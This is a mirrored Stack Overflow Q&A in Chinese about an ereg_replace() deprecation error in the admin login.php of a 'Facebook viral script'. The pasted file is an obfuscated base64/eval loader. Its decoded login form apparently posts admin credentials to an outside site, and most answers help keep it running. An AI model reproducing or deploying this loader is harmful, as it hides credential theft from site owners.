1. 首頁
  2. 問答
  3. 功能ereg_replace()已棄用

功能ereg_replace()已棄用

2013-02-26 130 views
0

我得到這個錯誤在我的login.php管理員cpanel。我正在使用Facebook病毒腳本。功能ereg_replace()已棄用

Deprecated: Function ereg_replace() is deprecated in /home/content/32/10528532/html/shockvideo/admincpanel/login.php(2) : eval()'d code on line 1

這是我整個的PHP:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?> 

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

如何解決呢?如果你可以請解釋爲像我這樣的新手。謝謝。

來源

2013-02-26 user2111818

+0

此PHP文件已加密。我們可以爲你做的不多 – 2013-02-26 15:39:54

+0

@ s.lenders它的模糊和不加密:) – HamZa 2013-02-26 15:54:30

回答

-1

臨時修復:將ereg_replace()更改爲@ereg_replace()。

這將隱藏警告。

但是你需要用preg_replace()重寫代碼。

來源

2013-02-26 15:23:56 Ghigo

1

過時的功能過時的,其不應該再被使用,並且將在未來的某個PHP的版本中刪除的功能。

而不是使用它們,你應該使用一些替代方案。嘗試使用preg_replace

來源

2013-02-26 15:24:20

0

您的代碼已編碼。它看起來很容易倒轉。從解碼base 64字符串開始。一旦你解碼它,你將需要用等同字母替換一些數字。

一旦你完成了這一步,將ereg_replace切換爲preg_replace是微不足道的。通常情況下,相同的模式將起作用,但格式稍有不同。

這是解碼結束時的部分。

$_X=base64_decode($_X); 
$_X=strtr($_X,'123456aouie','aouie123456'); 
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X); 
eval($_R); 
$_R=0; 
$_X=0;

來源

2013-02-26 15:29:38 datasage

1

的問題是,從這個代碼

$_R = ereg_replace('__FILE__', "'" . $_F . "'", $_X);

替換爲

$_R = preg_replace('/__FILE__/', "'" . $_F . "'", $_X);

來源

2013-02-26 15:34:41 Baba

0

從開始到結束:

在你的代碼替換 「EVAL」 與 「回聲」。 運行從控制檯的PHP腳本,你會得到這樣的PHP代碼:

<?php 
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456'); 
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0; 
?>

現在你看到有問題的功能。

快速修復:用@ereg_replace替換ereg_replace。

記住:這只是隱藏警告。您需要重寫代碼並使用preg_match(),因爲您的代碼依賴於不久將從PHP中刪除的棄用函數。

這是您的固定代碼:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456'); [email protected]_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;?>

來源

2013-02-26 16:04:36 Ghigo

+0

而不是*隱藏*的問題,它可以*固定*約兩*更多擊鍵比你在這裏使用。 – Sammitch 2013-02-26 16:17:09

0

之前已經我們都一直新手。但首先在SO上運行一個簡單的搜索,即使使用谷歌,也可以找到很多。有時候,我這樣做是對谷歌>

ereg_replace網站:stackoverflow.com

,並按下回車鍵。這表明你想要你可能正在尋找。

現在回到你的問題,你能不能在SO(#1)閱讀本

PHP ereg_replace deprecated

來源

2013-02-26 16:15:31

0

這非常寫,可笑的 「受保護」 的代碼,可以簡單地固定更換:

ereg_replace('pattern', 'replacement', $target);

附:

preg_replace('/pattern/', 'replacement', $target);

哪給你:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=preg_replace('/__FILE__/', "'".$_F."'", $_X);eval($_R);$_R=0;$_X=0;

編碼爲:

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXByZWdfcmVwbGFjZSgnL19fRklMRV9fLycsICInIi4kX0YuIiciLCAkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs =要放在接近尾聲eval(base64_decode())

就像說明一樣,包含eval(base64_decode())的代碼通常是病毒。如果它開始通過主機服務器上運行的掃描進程「清理」,請不要感到驚訝。

來源

2013-02-26 16:15:42 Sammitch

相關問題

 相關問題